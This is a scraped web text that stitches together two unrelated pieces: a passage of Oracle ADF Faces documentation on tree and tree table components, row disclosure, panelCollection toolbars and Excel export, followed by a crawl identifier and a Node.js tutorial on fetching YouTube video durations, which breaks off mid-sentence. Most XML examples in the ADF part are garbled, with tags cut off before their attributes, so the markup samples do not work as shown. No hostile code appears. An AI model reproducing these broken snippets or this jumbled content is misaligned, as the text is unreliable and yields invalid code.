Nodes." When a user selects or deselects a node, the tree component invokes a selectionEvent event. You can register custom selectionListener instances, which can do post-processing on the tree component based on the selected nodes. For more information, see Section 10.5.5, "What You May Need to Know About Programmatically Selecting Nodes." The RowDisclosureEvent event has two RowKeySet objects: the RemovedSet object for all the collapsed nodes and the AddedSet object for all the expanded nodes. The component expands the subtrees under all nodes in the added set and collapses the subtrees under all nodes in the removed set. Your custom rowDisclosureListener method can do post-processing, on the tree component, as shown in Example 10-13. Example 10-13 Tree Table Component with rowDisclosureListener <af:treeTable The backing bean method that handles row disclosure events is shown in Example 10-14. The example illustrates expansion of a tree node. For the contraction of a tree node, you would use getRemovedSet. Example 10-14 Backing Bean Method for RowDisclosureEvent public void handleRowDisclosure(RowDisclosureEvent rowDisclosureEvent) throws Exception { Object rowKey = null; Object rowData = null; RichTree tree = (RichTree) rowDisclosureEvent.getSource(); RowKeySet rks = rowDisclosureEvent.getAddedSet(); if (rks != null) { int setSize = rks.size(); if (setSize > 1) { throw new Exception("Unexpected multiple row disclosure added row sets found."); } if (setSize == 0) { // nothing in getAddedSet indicates this is a node // contraction, not expansion. If interested only in handling // node expansion at this point, return. return; } rowKey = rks.iterator().next(); tree.setRowKey(rowKey); rowData = tree.getRowData(); // Do whatever is necessary for accessing tree node from // rowData, by casting it to an appropriate data structure // for example, a Java map or Java bean, and so forth. } } Trees and tree tables use an instance of the oracle.adf.view.rich.model.RowKeySet class to keep track of which nodes are expanded. This instance is stored as the disclosedRowKeys attribute on the component. You can use this instance to control the expand or collapse state of an node in the hierarchy programatically, as shown in Example 10-15. Any node contained by the RowKeySet instance is expanded, and all other nodes are collapsed. The addAll() method adds all elements to the set, and the and removeAll() method removes all the nodes from the set. Example 10-15 Tree Component with disclosedRowKeys Attribute <af:tree The backing bean method that handles the disclosed row keys is shown in Example 10-16. Example 10-16 Backing Bean Method for Handling Row Keys public RowKeySet getDisclosedRowKeys() { if (disclosedRowKeys == null) { // Create the PathSet that we will use to store the initial // expansion state for the tree RowKeySet treeState = new RowKeySetTreeImpl(); // RowKeySet requires access to the TreeModel for currency. TreeModel model = getTreeModel(); treeState.setCollectionModel(model); // Make the model point at the root node int oldIndex = model.getRowIndex(); model.setRowKey(null); for(int i = 1; i<=19; ++i) { model.setRowIndex(i); treeState.setContained(true); } model.setRowIndex(oldIndex); disclosedRowKeys = treeState; } return disclosedRowKeys; } The tree and tree table components allow nodes to be selected, either a single node only, or multiple nodes. If the component allows multiple selections, users can select multiple nodes using Control+click and Shift+click operations. When a user selects or deselects a node, the tree component fires a selectionEvent event. This event has two RowKeySet objects: the RemovedSet object for all the deselected nodes and the AddedSet object for all the selected nodes. Tree and tree table components keep track of which nodes are selected using an instance of the class oracle.adf.view.rich.model.RowKeySet. This instance is stored as the selectedRowKeys attribute on the component. You can use this instance to control the selection state of a node in the hierarchy programatically. Any node contained by the RowKeySet instance is deemed selected, and all other nodes are not selected. The addAll() method adds all nodes to the set, and the and removeAll() method removes all the nodes from the set. Tree and tree table node selection works in the same way as table row selection. You can refer to sample code for table row selection in Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables." The ADF Faces tree table component displays hierarchical data in the form of a table. The display is more elaborate than the display of a tree component, because the tree table component can display columns of data for each tree node in the hierarchy. The component includes mechanisms for focusing on subtrees within the main tree, as well as expanding and collapsing nodes in the hierarchy. Figure 10-21 shows the tree table used in the File Explorer application. Like the tree component, the tree table can display the hierarchical relationship between the files in the collection. And like the table component, it can also display attribute values for each file. The immediate children of a tree table component must be column components, in the same way as for table components. Unlike the table, the tree table component has a nodeStamp facet which holds the column that contains the primary identifier of an node in the hierarchy. The treeTable component supports the same stamping behavior as the Tree component (for details, see Section 10.5, "Displaying Data in Trees"). For example, in the File Explorer application (as shown in Figure 10-21), the primary identifier is the file name. This column is what is contained in the nodeStamp facet. The other columns, such as Type and Size, display attribute values on the primary identifier, and these columns are the direct children of the tree table component. This tree table uses node as the value of the variable that will be used to stamp out the data for each node in the nodeStamp facet column and each component in the child columns. Example 10-17 shows abbreviated code for the tree table in the File Explorer application. Example 10-17 Stamping Rows in a TreeTable <af:treeTable <f:facet <af:column <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </af:column> </f:facet> <f:facet <af:panelGroupLayout> <af:image <af:outputText </af:panelGroupLayout> </f:facet> <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> </af:treeTable> The tree table component supports many of the same attributes as both tables and trees. For more information about these attributes see Section 10.2, "Displaying Data in Tables" and Section 10.5, "Displaying Data in Trees." You use the Insert Tree Table wizard to create a tree table. Once the wizard is complete, you can use the Property Inspector to configure additional attributes on the tree table. To add a tree table to a page: In the Component Palette, from the Common Components panel, drag and drop a Tree Table onto the page to open the Insert Tree Table wizard. Configure the table by completing the wizard. If you need help, press F1 or click Help. Use the Property Inspector to configure any other attributes. Tip:The attributes of the tree table are the same as those on the table and tree components. Refer to Section 10.2.4, "How to Display a Table on a Page," and Section 10.5.1, "How to Display Data in Trees" for help in configuring the attributes. There may be a case where you need to pass an entire row from a collection as a value. To do this, you pass the variable used in the table to represent the row, or used in the tree to represent a node, and pass it as a value to a property in the pageFlow scope. Another page can then access that value from the scope. The setPropertyListener tag allows you to do this (for more information about the setPropertyListener tag, including procedures for using it, see Section 4.7, "Passing Values Between Pages"). For example, suppose you have a master page with a single-selection table showing employees, and you want users to be able to select a row and then click a command button to navigate to a new page to edit the data for that row, as shown in Example 10-18. The EL variable name emp is used to represent one row (employee) in the table. The action attribute value of the commandButton component is a static string outcome showEmpDetail, which allows the user to navigate to the Employee Detail page. The setPropertyListener tag takes the from value (the variable emp), and stores it with the to value. Example 10-18 Using SetPropertyListener and PageFlowScope <af:table <af:column <af:outputText </af:column> <af:column <af:outputText </af:column> <af:column <af:commandButton <af:setPropertyListener </af:commandButton> </af:column> </af:table> When the user clicks the command button on an employee row, the listener executes, and the value of #{emp} is retrieved, which corresponds to the current row (employee) in the table. The retrieved row object is stored as the empDetail property of pageFlowScope with the #{pageFlowScope.empDetail} EL expression. Then the action event executes with the static outcome, and the user is navigated to a detail page. On the detail page, the outputText components get their value from pageFlowScope.empDetail objects, as shown in Example 10-19. Example 10-19 Retrieving PageFlowScope Objects <h:panelGrid <af:outputText <af:inputText <af:outputText <af:inputText <af:outputText <af:inputText <af:outputText <af:inputText </h:panelGrid> You can use the panelCollection component to add menus, toolbars, and status bars to tables, trees, and tree tables. To use the panelCollection component, you add the table, tree, or tree table component as a direct child of the panelCollection component. The panelCollection component provides default menus and toolbar buttons. Figure 10-22 shows the panelCollection component with the tree table component in the File Explorer application. The toolbar contains a menu that provides actions that can be performed on the tree table (such as expanding and collapsing nodes), a button that allows users to detach the tree table, and buttons that allow users to change the rows displayed in the tree table. You can configure the toolbar to not display certain toolbar items. For example, you can turn off the buttons that allow the user to detach the tree or table. For more information about menus, toolbars, and toolbar buttons, see Chapter 14, "Using Menus, Toolbars, and Toolboxes." Among other facets, the panelCollection component contains a menu facet to hold menu components, a toolbar facet for toolbar components, a secondaryToolbar facet for another set of toolbar components, and a statusbar facet for status items. The default top-level menu and toolbar items vary depending on the component used as the child of the panelCollection component: Table and tree: Default top-level menu is View. Table and tree table with selectable columns: Default top-level menu items are View and Format. Table and tree table: Default toolbar menu is Detach. Table and tree table with selectable columns: Default top-level toolbar items are Freeze, Detach, and Wrap Tree and tree table (when the pathStamp facet is used): The toolbar buttons Go Up, Go To Top, and Show as Top also appear. Example 10-20 shows how the panelCollection component contains menus and toolbars. Example 10-20 The panelCollection Component with Table, Menus, and Toolbars <af:panelCollection <f:facet <af:group> <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem </af:group> </f:facet> <f:facet <af:menu <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem </af:menu> </f:facet> <f:facet <af:toolbar> <af:commandToolbarButton </af:commandToolbarButton> <af:commandToolbarButton </af:commandToolbarButton> <af:commandToolbarButton </af:commandToolbarButton> </af:toolbar> </f:facet> <f:facet </f:facet> <f:facet <af:toolbar> <af:outputText </af:toolbar> </f:facet> <af:table rowselection="multiple" columnselection="multiple" ... <af:column ... </af:column> Tip:You can make menus detachable in the panelCollectioncomponent. For more information, see Section 14.2, "Using Menus in a Menu Bar." Consider using detached menus when you expect users to do any of the following: Execute similar commands repeatedly on a page. Execute similar commands on different rows of data in a large table, tree table, or tree. View data in long and wide tables or tree tables, and trees. Users can choose which columns or branches to hide or display with a single click. Format data in long or wide tables, tree tables, or trees. You add a panelCollection component and then add the table, tree, or tree table inside the panelCollection component. You can then add and modify the menus and toolbars for it. To create a panelCollection component with an aggregate display component: In the Component Palette, from the Layout panel, drag and drop a Panel Collection onto the page. Add the table, tree, or tree table as a child to that component. Alternatively, if the table, tree, or tree table already exists on the page, you can right-click the component and choose Surround With. Then select Panel Collection to wrap the component with the panelCollection component. Optionally, customize the panelCollection toolbar by turning off specific toolbar and menu items. To do so, select the panelCollection component in the Structure window. In the Property Inspector, set the featuresOff attribute. Table 10-1 shows the valid values and the corresponding effect on the toolbar. Add your custom menus and toolbars to the component: Menus: Add a menu component inside the menu facet. Toolbars: Add a toolbar component inside the toolbar or secondaryToolbar facet. Status items: Add items inside the statusbar facet. View menu: Add commandMenuItem components to the viewMenu facet. For multiple items, use the group component as a container for the many commandMenuItem components. From the Component Palette, drag and drop the component into the facet. For example, drop Menu into the menu facet, then drop Menu Items into the same facet to build a menu list. For more instructions about menus and toolbars, see Chapter 14, "Using Menus, Toolbars, and Toolboxes." You can export the data from a table, tree, or tree table, or from a table region of the DVT project Gantt chart to a Microsoft Excel spreadsheet. To allow users to export a table, you create an action source, such as a command button or command link, and add an exportCollectionActionListener component and associate it with the data you wish to export. You can configure the table so that all the rows will be exported, or so that only the rows selected by the user will be exported. Tip:You can also export data from a DVT pivot table. For more information, see Section 26.8, "Exporting from a Pivot Table." For example, Figure 10-23 shows the table from the ADF Faces demo that includes a command button component that allows users to export the data to an Excel spreadsheet. When the user clicks the command button, the listener processes the exporting of all the rows to Excel. As shown in Figure 10-23, you can also configure the exportCollectionActionListener component so that only the rows the user selects are exported. Note:Only the following can be exported: Value of value holder components (such as input and output components). Value of selectItem components used in selelctOneChoice and selectOneListbox components (the value of selectItem components in other selection components are not exported). Value of the text attribute of a command component. Depending on the browser, and the configuration of the listener, the browser will either open a dialog, allowing the user to either open or save the spreadsheet as shown in Figure 10-24, or the spreadsheet will be displayed in the browser. For example, if the user is viewing the page in Microsoft Internet Explorer, and no file name has been specified on the exportCollectionActionListener component, the file is displayed in the browser. In Mozilla Firefox, the dialog opens. If the user chooses to save the file, it can later be opened in Excel, as shown in Figure 10-25. If the user chooses to open the file, what happens depends on the browser. For example, if the user is viewing the page in Microsoft Internet Explorer, the spreadsheet opens in the browser window. If the user is viewing the page in Mozilla Firefox, the spreadsheet opens in Excel. Note:You may receive a warning from Excel stating that the file is in a different format than specified by the file extension. This warning can be safely ignored. You create a command component, such as a button, link, or menu item, and add the exportCollectionActionListener inside this component. Then you associate the data collection you want to export by setting the exportCollectionActionListener component's exportedId attribute to the ID of the collection component whose data you wish to export. Before you begin: You should already have a table, tree, or tree table on your page. If you do not, follow the instructions in this chapter to create a table, tree, or tree table. For example, to add a table, see Section 10.2, "Displaying Data in Tables." Tip:If you want users to be able to select rows to export, then configure your table to allow selection. For more information, see Section 10.2.2, "Formatting Tables." To export collection data to an external format: In the Component Palette, from the Common Components panel, drag and drop a command component, such as a button, to your page. Tip:If you want your table, tree, or tree table to have a toolbar that will hold command components, you can wrap the collection component in a panelCollectioncomponent. This component adds toolbar functionality. For more information, see Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars." You may want to change the default label of the command component to a meaningful name such as Export to Excel. In the Component Palette, from the Operations panel, drag an Export Collection Action Listener as a child to the command component. In the Insert Export Collection Action Listener dialog, set the following: ExportedId: Specify the ID of the table, tree, or tree table to be exported. Either enter it manually or use the dropdown menu to choose Edit. Use the Edit Property dialog to select the component. Type: Set to excelHTML. With the exportCollectionActionListener component still selected, in the Property Inspector, set the following: Filename: Specify the proposed file name for the exported content. When this attribute is set, a "Save File" dialog will typically be displayed, though this is ultimately up to the browser. If the attribute is not set, the content will typically be displayed inline, in the browser, if possible. Title: Specify the title of the exported document. Whether or not the title is displayed and how exactly it is displayed depends on Excel. ExportedRows: Set to all if you want all rows to be automatically selected and exported. Set to selected if you want only the rows the user has selected to be exported. Example 10-21 shows the code for a table and its exportCollectionActionListener component. Note that the exportedId value is set to the table id value. Example 10-21 Using the exportCollectionActionListener to Export a Table <af:table <af:column> . . . </af:column> </af:table> <af:commandButton <af:exportCollectionActionListener Exported data is exported in index order, not selected key order. This means that if you allow selected rows to be exported, and the user selects rows (in this order) 8, 4, and 2, then the rows will be exported and displayed in Excel in the order 2, 4, 8. Since there is no client-side support for EL in the rich client framework, nor is there support for sending entire table models to the client, if you need to access values on the client using JavaScript, the client-side code cannot rely on component stamping to access the value. Instead of reusing the same component instance on each row, a new JavaScript component is created on each row (assuming any component needs to be created at all for any of the rows), using the fully resolved EL expressions. Therefore, to access row-specific data on the client, you need to use the stamped component itself to access the value. To do this without a client-side data model, you use a client-side selection change listener. To access values on the client from a stamped component, you first need to make sure the component has a client representation. Then you need to register a selection change listener on the client and then have that listener handle determining the selected row, finding the associated stamped component for that row, use the stamped component to determine the row-specific name, and finally interact with the selected data as needed. To access selected values from stamped components: In the Structure window for your page, select the component associated with the stamped row. For example, in Example 10-22 the table uses an outputText component to display the stamped rows. Example 10-22 Table Component Uses an outputText Component for Stamped Rows <af:table <af:column <af:outputText </af:column> </af:table> Set the following on the component: Expand the Common section of the Property Inspector and if one is not already defined, set a unique ID for the component using the Id attribute. Expand the Advanced section and set ClientComponent to True. In the Component Palette, from the Operations panel, drag and drop a Client Listener as a child to the table. In the Insert Client Listener dialog, enter a function name in the Method field (you will implement this function in the next step), and select selection from the Type dropdown. If for example, you entered mySelectedRow as the function, JDeveloper would enter the code shown in bold in Example 10-23. Example 10-23 Using a clientListener to Register a Selection <af:table <af:clientListener ... </af:table> This code causes the mySelectedRow function to be called any time the selection changes. In your JavaScript library, implement the function entered in the last step. This function should do the following: Figure out what row was selected. To do this, use the event object that is passed into the listener. In the case of selection events, the event object is of type AdfSelectionEvent. This type provides access to the newly selected row keys via the getAddedSet() method, which returns a POJSO (plain old JavaScript object) that contains properties for each selected row key. Once you have access to this object, you can iterate over the row keys using a "for in" loop. For example, the code in Example 10-24 extracts the first row key (which in this case, is the only row key). Find the stamped component associated with the selected row. The client-side component API AdfUIComponent exposes a findComponent() method that takes the ID of the component to find and returns the AdfUIComponent instance. When using stamped components, you need to find a component not just by its ID, but by the row key as well. In order to support this, the AdfUITable class provides an overloaded method of findComponent(), which takes both an ID as well as a row key. In the case of selection events, the component is the source of the event. So you can get the table from the source of the event and then use the table to find the instance using the ID and row key. Example 10-25 shows this, where nameStamp is the ID of the table. Example 10-25 Finding a Stamped Component Instance Given a Selected Row // We need the table to find our stamped component. // Fortunately, in the case of selection events, the // table is the event source. var table = event.getSource(); // Use the table to find the name stamp component by id/row key: var nameStamp = table.findComponent("nameStamp", firstRowKey); Add any additional code needed to work with the component. Once you have the stamped component, you can interact with it as you would with any other component. For example, Example 10-26 shows how to use the stamped component to get the row-specific value of the name attribute (which was the stamped value as shown in Example 10-22)and then display the name in an alert. Example 10-27 shows the entire code for the JavaScript. Example 10-27 JavaScript Used to Access Selected Row Value function showSelectedName(event) { var firstRowKey; var addedRowKeys = event.getAddedSet(); for (var rowKey in addedRowKeys) { firstRowKey = rowKey; break; } // We need the table to find our stamped component. // Fortunately, in the case of selection events, the // table is the event source. var table = event.getSource(); // We use the table to find the name stamp component by id/row key: var nameStamp = table.findComponent("nameStamp", firstRowKey); if (nameStamp) { // This is the row-specific name var name = nameStamp.getValue(); alert("The selected name is: " + name); } } Row keys are tokenized on the server, which means that the row key on the client may have no resemblance to the row key on the server. As such, only row keys that are served up by the client-side APIs (like AdfSelectionEvent.getAddedSet()) are valid. Also note that AdfUITable.findComponent(id, rowKey)method may return null if the corresponding row has been scrolled off screen and is no longer available on the client. Always check for null return values from AdfUITable.findComponent() method.
http://docs.oracle.com/cd/E25054_01/web.1111/b31973/af_table.htm
CC-MAIN-2017-17
refinedweb
17,160
53.21
, I'm having a bizarre problem where a py2exe'd application crashes when starting, but so far the problem happens only on Windows 2000. It crashes consistently if I list the application as a Windows startup script (as in, if I list it in the registry under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run), but I can also occasionally get it to crash just from the command line (though this is pretty rare). This problem was reported to me by a user on a Windows 2000 box, and I was able to reproduce it on my own Windows 2000 box, but so far not on Windows 98 or Windows XP. I have never gotten the crash to happen when running from source, only after py2exe'ing it. When I heard about the problem, I began to narrow down the code to find out what was wrong, and in the end my script consisted of a single line: import random My py2exe script looks like this: from distutils.core import setup import py2exe, sys sys.argv.append('py2exe') setup(console=['CrashWin2k.py']) I've started narrowing down the code in the random.py module, and have it down to this chunk: os import urandom as _urandom #from binascii import hexlify as _hexlify #NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0) TWOPI = 2.0*_pi LOG4 = _log(4.0) SG_MAGICCONST = 1.0 + _log(4.5) BPF = 53 # Number of bits in a float print 'bad line' RECIP_BPF = 2**-BPF print 'all done' If I run this on bootup, the 'all done' never gets printed, but 'bad line' does. So it appears that the 2**-BPF line causes the crash, although when I put this line in a module by itself (with the "BPF=53" line of course) and py2exe'd it, it worked fine. When it crashes, Windows generates a Dr. Watson log file with my app being the offending process and a "Exception number: c000001d (illegal instruction)" line. Anyway, I'm continuing to whittle down lines of code, but thought I'd ask if anyone has any insight at all into this as it's pretty maddening to reboot each time I comment out a line. :) I'm using Python 2.4.1 + py2exe 0.6.1 (although I also see my problem with py2exe-0.5.4). I'm also in the process of putting together a debug build, but I might be doing something wrong: 1) icon.rc was missing from the py2exe-0.6.1.zip file - does it get auto-generated or something? I pulled a copy out of CVS and that seemed to get me a little farther 2) py2exe tried to copy w9xpopen.exe (instead of w9xpopen_d.exe) 3) after the above two are fixed, I do get a finished build, but the application errors out before running any of my code and displays: undefined symbol Py_InitModule4 -> exit(-1) LoadLibrary(pythondll) failedThe system cannot find the file specified. I'm still trying to figure that one out. Any hints, tips, and/or consolation would be appreciated. :) Thanks in advance! -Dave Hi all, I just download py2exe - 0.6.1 for Python24 (winXP) and am trying to creat= e=20 single file executables for an NT service. The resulting exe file that I get builds and installs just fine, however I= =20 receive the following error when trying to use the -remove command to=20 uninstall the service =20 C:\dev\WCMS\image_processing\MediaUnzipper\dist>MediaUnzipper -install C:\dev\WCMS\image_processing\MediaUnzipper\dist>MediaUnzipper -remove Traceback (most recent call last): File "boot_service.py", line 161, in ? File "win32serviceutil.pyo", line 263, in RemoveService pywintypes.error: (2, 'UnloadPerfCounterTextStrings', 'The system cannot=20 find the file specified.') I do not receive this error when the executable is built as multiple files= =20 (ie 'bundle_files' option turned off). Any idea how I can fix this? David, I haven't been able to get back to on the solution that you gave me, but it worked. Well, you gave me two solutions - the one listed at worked like a charm. For some reason, I do not have the error message, I could not get the function to work. Py2exe spit out some error message that I no longer have in front of me. Anyway, thank you very much for your assistance -- CHAD BEST "David Bolen" <db3l@...> wrote in message news:uoe7frour.fsf@... > Chad Best <slug57_98@...> writes: > > > I have created a script that will scan an image, resize it and adjust the > > quality, then upload it to my webhost. > > Are you using PIL to handle your image processing? You've got to help > py2exe out to know what image plugins to load since they are loaded > dynamically by PIL and can't be auto-detected by py2exe. > > > shows one way of manually importing the needed plugins. Or, I tend to > use an approach of just adding the appropriate plugin modules to my > "includes" option to py2exe in the setup.py module, thus avoiding any > explicit import in my code itself. > > If you want to suck in all possible plugins automatically, you could > have your setup script dynamically determine all available plugins and > build up the "includes" option ... that's the way the "hook" in the > Installer package does it - as in Installer 6a2: > > def install_Image(lis): > import Image > # PIL uses lazy initialization. > # you can decide if you want only the > # default stuff: > Image.preinit() > # or just everything: > Image.init() > import sys > for name in sys.modules: > if name[-11:] == "ImagePlugin": > lis.append(name) > > This appends the modules to the supplied list (which could be the > includes option). It's slightly heavyweight since by importing Image > it's actually loading the plugins, but it's sort of "set and forget." > It's basically the same way that PIL itself auto-detects plugins > (looking for modules whose name ends in ImagePlugin). > > Thinking of this reminds me how nice the "hook" approach in installer > is (you can easily add functions that ran on imports of a specific > module which could modify the list of modules that were "detected"). > The big benefit is that you could write a hook for a given module once > and anyone else using that module got the benefit of the hook special > processing. I wonder if anyone has experimented with modifying > modulefinder (or having py2exe post-process its result) to support a > similar approach? > > -- David > > > > ------------------------------------------------------- > SF.Net email is Sponsored by the Better Software Conference & EXPO > September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices > Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA > Security * Process Improvement & Measurement * Thomas,=20 Thank you very much for implementing the bundling features in py2exe! While I still intend to distribute full directories for the main applications we have at work, the ability to create a singlefile exe for small utilties will be very useful when creating small tools and allowing other people to easily run them. I've created a small sample application, set bundle_files to 1 and everything seems to work perfectly on my machine. As I expected, if I copy the exe to a fresh install of WinXP, it fails in the usual way: "This application has failed to start because MSVCR71.dll was not found. Re-installing the application may fix this problem." And, if I copy MSVCR71.dll into the application directory, it works fine.= =20 But, wouldn't it be nice if I could include MSVCR71.dll as well? (since I've got a VS licence) So, just to test, I added a line to build_exe.py py2exe._run after the dlls are found: dlls.add('msvcr71.dll') The resulting exe is larger, and 'MSVCRT71.dll' appears in the file when I edit with a text editor, however the test application still fails on the bare WinXP install, so I expect that the MSVCR71.dll needs to be handled in a special way? Take care, -Brian Michele Petrazzo <michele.petrazzo@...> writes: > Yes, this has also been reported on c.l.p. It works with wxPython versions up to 2.5.1.5, but crashes in newer versions. I'm looking into it. Thomas
https://sourceforge.net/p/py2exe/mailman/py2exe-users/?viewmonth=200509&viewday=6
CC-MAIN-2017-43
refinedweb
1,355
64.51
How to Fetch a YouTube Video's Duration in Node.js August 6th, 2021 What You Will Learn in This Tutorial How to use the YouTube API to fetch a video's metadata and parse the duration string to get hours, minutes, and seconds separately. Table of Contents Getting Started For this tutorial, we're going to use the CheatCode Node.js Boilerplate to give us a starting point for our work. To start, let's clone a copy: Terminal git clone Next, install the dependencies: Terminal cd nodejs-server-boilerplate && npm install After those are installed, add the node-fetch dependency which we'll use to send requests to the YouTube API: Terminal npm i node-fetch With that installed, start up the development server: Terminal npm run dev Once running, we're ready to jump into the code. Wiring up an endpoint for fetching durations Before we jump into fetching durations, we're going to set up an HTTP endpoint using Express that we can use to call our fetch code. /api/index.js import graphql from "./graphql/server"; import getYoutubeVideoDuration from "../lib/getYoutubeVideoDuration"; export default (app) => { graphql(app); app.use("/youtube/duration/:videoId", async (req, res) => { const duration = await getYoutubeVideoDuration(req?.params?.videoId); res.set("Content-Type", "application/json"); res.send(JSON.stringify(duration, null, 2)); }); }; In the boilerplate we're using for this tutorial, an Express app is already initialized for us in /index.js at the root of the app. In that file, multiple functions are imported and passed the Express app instance. In this file, we have one of those functions defined that's responsible for defining our API-related routes. By default, the boilerplate supports a GraphQL API which has been imported here and called handing off the Express app instance. The point here is organization; nothing technical. All you need to understand at this point is that the app being passed in as the argument to the function we're defining here is the app instance returned when we call the express() function exported by express. The important part here is how we're using that app instance. To make fetching our video durations easier, we're defining a new route via the app.use() method exported by Express. Here, we expect the URL to return us an array of one or more objects detailing the duration for one or more videos. Here, :videoId will be replaced by one or more YouTube video IDs (e.g., or). In the callback of the function, we can see that we're calling to a function that we'll define next getYoutubeVideoDuration(), passing it the expected :videoId from our URL via req?.params?.videoId where the ? question marks are just a short-hand way of saying "if req exists and params exists on req, and videoId exists on req.params, return the videoId here." Again, videoId will be a string containing one or several YouTube video IDs (if more than one, we expect them to be comma-separated). When we call this function, we make a point to put an await keyword in front of it and make sure to add the async keyword to our route's callback function. This is required. If we omit the async keyword, we'll get an error when we run this code about await being a reserved keyword. Here, await is saying "when you get to this line of code, wait until the JavaScript Promise it returns is resolved, or, wait until this code completes before evaluating the lines after this one." Next, in order to respond to the request, we first set the Content-Type header to application/json using the res.set() method provided by Express and then finally, respond to the request with our found durations array via res.send(). Here, the JSON.stringify(duration, null, 2) part is just "prettifying" the string we return so it's spaced out in the browser and not mushed together (helpful for readability). Now that we have our basic scaffolding set up, to make this work, let's take a look at the getYoutubeVideoDuration function we're importing up at the top of the file. Fetching a video's metadata from the YouTube API Two things to do. First, we need to make a request to YouTube's API to fetch the metadata for our video(s)—this will include the duration for the video—and second, we need to parse the duration from that metadata so that it's easier to use in our app (hypothetically speaking). Let's wire up the request to the API now and get back the metadata: ); }); }; To make our work a bit easier, we're outputting all of the code we'll need to communicate with the YouTube API here. To start, from this file, we export a function that takes in the anticipated youtubeVideoId string (we use a singular form here but this doesn't change that we can pass a string with a comma-separated list). Next, using the URL constructor function imported from the native Node.js url package—native meaning you don't need to install anything extra—we create a new url object, passing in the base URL for the YouTube API (specifically, v3 of the videos endpoint). With our url object (what we get back from new URL()), next, in order to pass data to YouTube, we need to use query params (as opposed to a POST body). To make passing those query params less error-prone, we use the URLSearchParams constructor function also imported from the Node.js url package. To it, we pass an object that we want to serialize (convert) into a query string like this ?key=someAPIKey&part=contentDetails&id=someVideoId. Here, we assign url.search to this where the search property is the name used by the url library to refer to the query params on the URL object (a technical artifact of the original intent of query params which is to aid in adding context to a search operation). Focusing in on what params we're passing, there are three we care about: keywhich contains our YouTube API key (if you don't have one of these yet learn how to generate one here—make sure to get the API key version, not the OAuth2 version). partwhich describes which part of the available data returned by the YouTube API we want in return to our request. idwhich is the string of one or more Youtube video IDs we want to fetch data for. Of note, the key we're pulling in here is using the settings convention that's built-in to the boilerplate we're using. This gives us an environment-specific way to store configuration data safely in our app. The settings value being imported at the top is from the /lib/settings.js file which contains code that decides which settings file to load from the root of our app. It does this using the current value of process.env.NODE_ENV. For this tutorial, because we're in the development environment, we'll load up the settings-development.json file at the root of our app. If we were deploying to a production environment, we'd load up settings-production.json. Taking a quick look at that file, let's see where our Youtube API key needs to go: /settings-development.json { "authentication": { "token": "abcdefghijklmnopqrstuvwxyz1234567890" }, ... "youtube": { "apiKey": "Your key goes here..." } } Alphabetically, we add a property youtube to the main settings object with a nested apiKey property with its value set to the API key we retrieved from YouTube. Back in our code when we call to settings?.youtube?.apiKey, this is the value we're referencing. ); }); }; With all of our config out of the way, we're ready to fetch our video metadata from YouTube. Using the fetch function we're importing up top from the node-fetch package we installed earlier (this is just a Node-friendly implementation of the browser fetch() method), we pass in our url object, appending a .then() and .catch() callback on the end, meaning we anticipate that our call to fetch() will return a JavaScript Promise. In the .catch() callback, if something goes wrong, we just log out the error to our server console with console.warn() (you may want to hand this off to your logging tool, if applicable). The part we care about here, the .then() callback, is where all of the action happens. First, we take the response argument we expect to be passed to the .then() callback, calling its .json() method and using the await keyword—remembering to add the async keyword to the callback function to avoid a syntax error. Here, response.json() is a function that fetch() provides us which allows us to convert the HTTP response object we get back into a format of our choice (within the limitations of the API we're calling to). In this case, we expect the data YouTube sends back to us to be in a JSON format, so we use the .json() method here to convert the raw response into JSON data. With that data object, next, we expect YouTube to have added an items property on that object which contains an array of one or more objects describing the video IDs we passed via the id query param in our url. Now for the fun part. With our list of videos (one or more), we want to format that data into something that's more usable in our application. By default, YouTube formats the duration timestamp stored under the video's contentDetails object as a string that looks something like PT1H23M15S which describes a video with a video duration of 1 hour, 23 minutes, and 15 seconds. As-is, this string isn't very helpful, so we want to convert it into something we can actually use in our code. To do it, in the next section, we're going to rig up that getDuration() method we're calling here. Before we do, so it's clear, once we've retrieved this formatted duration value, because we're returning our call to videos.map() back to our .then() callback and also returning our call to fetch() from our function, we expect the mapped videos array to be the value returned from the function we're exporting from this file (what ultimately gets handed back to our res.send() in `/api/index.js). Parsing the duration string returned by the YouTube API Let's isolate that getDuration() function we spec'd out at the top of our file and walk through how it works. /lib/getYoutubeVideoDuration.js const getDuration = (durationString = "") => { const duration = { hours: 0, minutes: 0, seconds: 0 }; const durationParts = durationString .replace("PT", "") .replace("H", ":") .replace("M", ":") .replace("S", "") .split(":"); if (durationParts.length === 3) { duration["hours"] = durationParts[0]; duration["minutes"] = durationParts[1]; duration["seconds"] = durationParts[2]; } if (durationParts.length === 2) { duration["minutes"] = durationParts[0]; duration["seconds"] = durationParts[1]; } if (durationParts.length === 1) { duration["seconds"] = durationParts[0]; } return { ...duration, string: `${duration.hours}h${duration.minutes}m${duration.seconds}s`, }; }; Our goal here is to get back an object with four properties: hoursdescribing how many hours ( 0or more) the video plays for. minutesdescribing how many minutes ( 0or more) the video plays for. secondsdescribing how many seconds the video plays for. - A string concatenating together the above three values that we can—hypothetically—display in the UI of our app. To get there, first, we initialize an object called duration which will contain the hours, minutes, and seconds for our video. Here, we set those properties on the object and default them to 0. Next, remember that our duration string looks something like: PT1H23M15S. It can also look like PT23M15S or PT15S if it's less than an hour in length or less than a minute in length. To handle these different cases, here, we take the durationString we've passed in and first remove the PT part using .replace() and then swap the H and M parts with a : symbol, and finally, remove the S value. At the end of this chain, we call a .split() on the : character that we just added into the string to split our hours, minutes, and seconds, into an array. So it's clear, the transformation flows like this: // 1 PT1H23M15S // 2 1H23M15S // 3 1:23:15S // 4 1:23:15 // 5 ['1', '23', '15'] With these durationParts we can start to move towards an easier to work with duration value. More specifically, the work we need to do is decide what the hours, minutes, and seconds properties on our duration object that we defined at the top of our function need to be set to (if at all). The trick we're using here is to test the length of the durationParts array. If it contains 3 items, we know that it has hours, minutes, and seconds. If it contains 2 items, we know that it has minutes and seconds. And if it has 1 item, we know that it has seconds. For each of these cases, we add an if 